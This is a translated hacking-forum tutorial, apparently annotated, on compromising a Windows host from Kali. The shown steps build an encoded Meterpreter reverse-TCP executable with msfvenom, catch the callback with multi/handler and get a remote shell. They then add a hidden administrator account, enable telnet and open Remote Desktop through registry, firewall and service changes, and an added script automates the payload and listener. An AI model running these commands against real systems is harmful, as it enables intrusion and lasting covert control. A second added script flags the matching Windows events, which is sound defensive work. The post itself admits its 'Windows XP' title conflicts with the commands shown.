Vulnerability Exploitation: One Example, Many Applications

小皮
1450 小皮, Chief Executive Operating Officer
Ideas & Techniques  2019-12-28 16:45:07
Part one: the Metasploitable operating system, the target machine that is attacked
1: Download URL
https://sourceforge.net/projects/metasploitable/

2: Open it with VMware. Metasploitable is deliberately vulnerable, so keep it and the Kali attacker on an isolated (host-only) virtual network and never expose it to a real network.

3: The default login user name and password are both msfadmin
The root password is msfadmin as well
4: Give the target a fixed IP address so that the tests are repeatable. This is done on the Metasploitable VM itself (the original post shows a Kali prompt here, but the file being edited belongs to the target):
root@metasploitable:~# vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address 192.168.10.123
netmask 255.255.255.0
gateway 192.168.10.254
root@metasploitable:~# /etc/init.d/networking restart


Part two: Armitage, a management front end used to discover and attack targets

1: Start the database from the command line
root@kali:~# service postgresql start
(On a fresh Kali install, also run msfdb init once so that the framework has a database to connect to.)

2: Click the Metasploit Framework button on the left to start the framework

[image: 图片1.png]

3: In the Metasploit terminal that opens, run db_status to check the state of the database connection

[image: 图片2.png]

4: Type armitage at the msf prompt. Armitage is a separate program; msfconsole passes commands it does not recognise through to the system shell, so this is the same as running armitage from an ordinary terminal. A connection window opens showing the details of the Metasploit RPC service; click Connect, answer "Yes" in the dialog that follows, wait for the progress window, and the Armitage interface opens.

msf > armitage

[image: 图片3.png]

[image: 图片4.png]

[image: 图片5.png]

[image: 图片6.png]

5: Open the Hosts menu, choose Nmap Scan, then Quick Scan (OS detect), enter the network range to scan and click OK.
The hosts being scanned do not need their firewalls switched off: a host firewall only limits which ports and OS fingerprints the scan reports. Once the scan has populated the host list, the target can be attacked from Armitage.

[image: 图片7.png]



Part three: compromising a Windows system (the post targets Windows XP)
1: Open a terminal on the attacker machine (Kali) and run the command below. It writes a Meterpreter reverse-TCP executable into root's home directory; LHOST and LPORT are the attacker's address and listening port, and the handler in step 4 must use the same values. The file is copied to the target later (step 6), not generated there.
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.10.30 LPORT=1234 -f exe > 77169.exe


No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
Final size of exe file: 73802 bytes


2: In the same terminal, run msfconsole to start the framework
root@kali:~# msfconsole

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >


3: In msf, load the generic handler that will receive the callback from the executable
msf > use exploit/multi/handler
msf exploit(handler) >

4: Set the attacker's IP address and listening port. These must be the same LHOST and LPORT that were passed to msfvenom. The handler's PAYLOAD should also be set explicitly to windows/meterpreter/reverse_tcp, the payload msfvenom was given; a handler whose payload does not match the executable will not stage Meterpreter correctly.
msf exploit(handler) > set LHOST 192.168.10.30
LHOST => 192.168.10.30

msf exploit(handler) > set LPORT 1234
LPORT => 1234

5: Run exploit to start listening. The "Sending stage" and "session opened" lines appear only once the executable from step 6 has been run on the target (192.168.10.5 here).
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.10.30:1234
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.10.5
[*] Meterpreter session 1 opened (192.168.10.30:1234 -> 192.168.10.5:49819) at 2018-10-10 10:30:52 +0800




6: Copy the executable generated earlier to the target and run it there (in the lab it can simply be copied and pasted through the VMware GUI, using the shared clipboard or drag-and-drop).
7: Interact with the session from the attacker machine

msf exploit(handler) > sessions 1
(sessions -i 1 is the explicit form.) Then type shell to get a remote command prompt on the target.
8: Keep persistent control of the target
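The whole of steps 1 to 5 above is three values (payload, LHOST, LPORT) that must agree between msfvenom and the handler; the post types them twice by hand and never sets PAYLOAD on the handler. The script below is an added example, not code from the original post: it derives the msfvenom command line and a matching exploit/multi/handler resource script from one set of values, and parses the "session opened" line so callbacks can be logged from a script. The addresses, port and file name are placeholders copied from the walkthrough; ExitOnSession false with exploit -j -z is an assumption about how you want the listener to behave (it keeps listening after the first callback).

```shell
#!/bin/sh
# Added example (not from the original post): build the msfvenom command and a
# matching exploit/multi/handler resource script from ONE set of values, so the
# handler's PAYLOAD, LHOST and LPORT can never drift from the executable.
# Values below are placeholders taken from the walkthrough.

# Print a resource script for exploit/multi/handler.
# "set ExitOnSession false" plus "exploit -j -z" keeps the job listening after
# the first callback, so a re-run executable or a second host can connect.
handler_rc() {
    payload="$1"; lhost="$2"; lport="$3"
    printf '%s\n' \
        "use exploit/multi/handler" \
        "set PAYLOAD $payload" \
        "set LHOST $lhost" \
        "set LPORT $lport" \
        "set ExitOnSession false" \
        "exploit -j -z"
}

# Print the msfvenom command that builds the matching executable
# (-o instead of a shell redirect, so msfvenom's own messages stay on stderr).
venom_cmd() {
    payload="$1"; lhost="$2"; lport="$3"; out="$4"
    printf 'msfvenom -p %s -e x86/shikata_ga_nai -i 5 LHOST=%s LPORT=%s -f exe -o %s\n' \
        "$payload" "$lhost" "$lport" "$out"
}

# Extract "<id> <attacker:port> -> <victim:port>" from handler output on stdin,
# so sessions are logged rather than read off the screen.
session_endpoints() {
    sed -n 's/.*Meterpreter session \([0-9]*\) opened (\([^)]*\)).*/\1 \2/p'
}

# Only invoke the real tools when asked (RUN=1); the functions above are pure.
if [ "${RUN:-0}" = 1 ]; then
    PAYLOAD=windows/meterpreter/reverse_tcp
    LHOST=192.168.10.30
    LPORT=1234
    handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > handler.rc
    sh -c "$(venom_cmd "$PAYLOAD" "$LHOST" "$LPORT" 77169.exe)"
    msfconsole -q -r handler.rc
fi
```

Run it as RUN=1 sh build_handler.sh on Kali; msfconsole -q -r handler.rc replaces steps 2 to 5 of the post with one command, and the generated file documents exactly what the listener was configured with.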



Part one: enable the telnet remote service
(First obtain a Meterpreter session on the target exactly as in part three above: generate the executable with msfvenom, start exploit/multi/handler with the same LHOST and LPORT, run the file on the target and enter the session with sessions 1.)
1: Open an interactive shell inside the session. execute -H -f cmd -i starts cmd.exe as a hidden process and attaches to it; the plain shell command gives the same command prompt without hiding the process, so use one or the other.
meterpreter > execute -H -f cmd -i
meterpreter > shell
2: Create a Service_Account user and add it to the local Administrators group (mayidui1 is the post's example password)
C:\Users\Administrator\Desktop>net user Service_Account mayidui1 /add
C:\Users\Administrator\Desktop>net localgroup administrators Service_Account /add
3: Add Service_Account to the TelnetClients group. This group only exists once the Telnet Server feature is installed on the target; if net reports that the group does not exist, the feature is missing and the service cannot be enabled in step 4 either.
C:\Users\Administrator\Desktop>net localgroup TelnetClients Service_Account /add

4: Turn telnet into persistent access: leave the command prompt and run the gettelnet Meterpreter script with -e, which enables and starts the Telnet service on the target
C:\Users\Administrator\Desktop>exit
meterpreter > run gettelnet -e
5: If the service is still not running, start it on the Windows side in services.msc (Control Panel), or from the same command prompt with sc config and net start; the service name is TlntSvr.
6: Connect from Kali and log in as Service_Account (192.168.10.127 is the address the post uses for this target; use the address of your own). Note that telnet sends the credentials in clear text.
root@kali:~# telnet 192.168.10.127




Part two: enable the Windows Remote Desktop (terminal) service, for graphical management of the target
1: Get a command prompt inside the session
meterpreter > shell
2: Change the registry so that Remote Desktop connections are no longer denied
C:\Users\Administrator\Desktop>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
3: Add a firewall rule so that Remote Desktop (TCP 3389) is allowed through. netsh advfirewall exists on Windows Vista / Server 2008 and later; the C:\Users\... paths in these prompts show that the target here is such a system, not the XP named in the section title. On XP the older netsh firewall syntax has to be used instead.
C:\Users\Administrator\Desktop>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
4: Start the Remote Desktop service (the service name is TermService; service names are case-insensitive)
C:\Users\Administrator\Desktop>net start Termservice
5: Make the service start automatically at boot (sc requires the space after start=)
C:\Users\Administrator\Desktop>cd \
C:\>sc config Termservice start= auto
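Every step of the two persistence parts above leaves a record on the target: a new local user (Security event 4720), a member added to Administrators or TelnetClients (4732), a firewall exception rule added (4946) and a service start type changed to automatic (System event 7040). The script below is an added example, not code from the original post, showing the check a defender would run over such a log: it flags those events and reports whether the whole chain (new account, privileged group, remote access opened) is present. The event lines are constructed for this example in a simple "EventID|Channel|Message" layout, which is an assumption; a real wevtutil or CSV export needs its own field mapping, and the message texts are paraphrases of the Windows ones. The registry change in step 2 is deliberately not covered: it only produces an event (4657) if a SACL has been set on that key, which is not the default.

```shell
#!/bin/sh
# Added example (not from the original post): detection side of the telnet and
# RDP persistence steps. Event lines are CONSTRUCTED in "EventID|Channel|Message"
# form; real exports need their own field mapping (an assumption).

# Constructed sample: the chain from the walkthrough, plus benign noise.
SAMPLE_EVENTS='4624|Security|An account was successfully logged on. Account Name: Administrator
4720|Security|A user account was created. Target Account Name: Service_Account
4732|Security|A member was added to a security-enabled local group. Group Name: Administrators Member: Service_Account
4732|Security|A member was added to a security-enabled local group. Group Name: TelnetClients Member: Service_Account
7040|System|The start type of the Telnet service was changed from disabled to auto start.
4946|Security|A rule was added to Windows Firewall exception list. Rule Name: Remote Desktop
7040|System|The start type of the Remote Desktop Services service was changed from demand start to auto start.
7036|System|The Print Spooler service entered the running state.'

# Print "TAG message" for each event that belongs to the persistence chain.
# Reads events from stdin; everything else is dropped.
flag_persistence() {
    awk -F'|' '
        $1 == 4720 { print "ACCOUNT_CREATED", $3; next }
        $1 == 4732 && $3 ~ /Group Name: (Administrators|TelnetClients)/ { print "PRIV_GROUP_ADD", $3; next }
        $1 == 4946 && $3 ~ /Remote Desktop/ { print "FW_RULE_RDP", $3; next }
        $1 == 7040 && $3 ~ /(Telnet|Remote Desktop Services)/ { print "SVC_AUTOSTART", $3; next }
    '
}

# Return 0 when the full chain is present: a new account, added to a privileged
# group, and remote access opened (firewall rule or service set to auto start).
# Any one of these alone is routine administration; the combination is the signal.
chain_present() {
    flags="$(flag_persistence | cut -d' ' -f1 | sort -u | tr '\n' ' ')"
    case "$flags" in *ACCOUNT_CREATED*) ;; *) return 1 ;; esac
    case "$flags" in *PRIV_GROUP_ADD*) ;; *) return 1 ;; esac
    case "$flags" in *FW_RULE_RDP*|*SVC_AUTOSTART*) return 0 ;; *) return 1 ;; esac
}

# Stand-alone run over the constructed sample: flagged events, then the verdict.
printf '%s\n' "$SAMPLE_EVENTS" | flag_persistence
if printf '%s\n' "$SAMPLE_EVENTS" | chain_present; then
    echo "VERDICT: persistence chain present"
else
    echo "VERDICT: no chain"
fi
```

On the sample above, flag_persistence prints six lines (the 4624 logon and the 7036 spooler event are ignored) and chain_present succeeds; feed it a log with only the 4720 and it fails, which is the point: the detection keys on the sequence the post walks through, not on any single command. The event IDs are the Vista-and-later Security and System log IDs, matching the target the prompts in this part reveal; Windows XP used a different numbering.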

Title: Vulnerability Exploitation: One Example, Many Applications
Author: 小皮
Source: 蚁安黑客官网
Please credit this link when reposting: http://bbs.mayidui.net/t3133.html